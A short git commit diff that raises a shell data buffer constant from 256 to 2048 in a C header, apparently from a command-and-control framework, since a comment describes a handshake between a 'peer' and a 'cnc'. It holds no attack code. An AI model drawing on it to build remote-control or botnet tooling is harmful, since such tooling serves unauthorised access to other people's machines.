Increased shell data buffer

This commit is contained in:
CPunch 2022-04-06 00:35:50 -05:00
parent 592e347fb6
commit 08d17d56b3
1 changed files with 1 additions and 1 deletions

View File

@ -12,7 +12,7 @@
#define LAIKA_IPV4_LEN 22
#define LAIKA_INET_LEN 22
#define LAIKA_SHELL_DATA_MAX_LENGTH 256
#define LAIKA_SHELL_DATA_MAX_LENGTH 2048
/* first handshake between peer & cnc works as so:
- peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip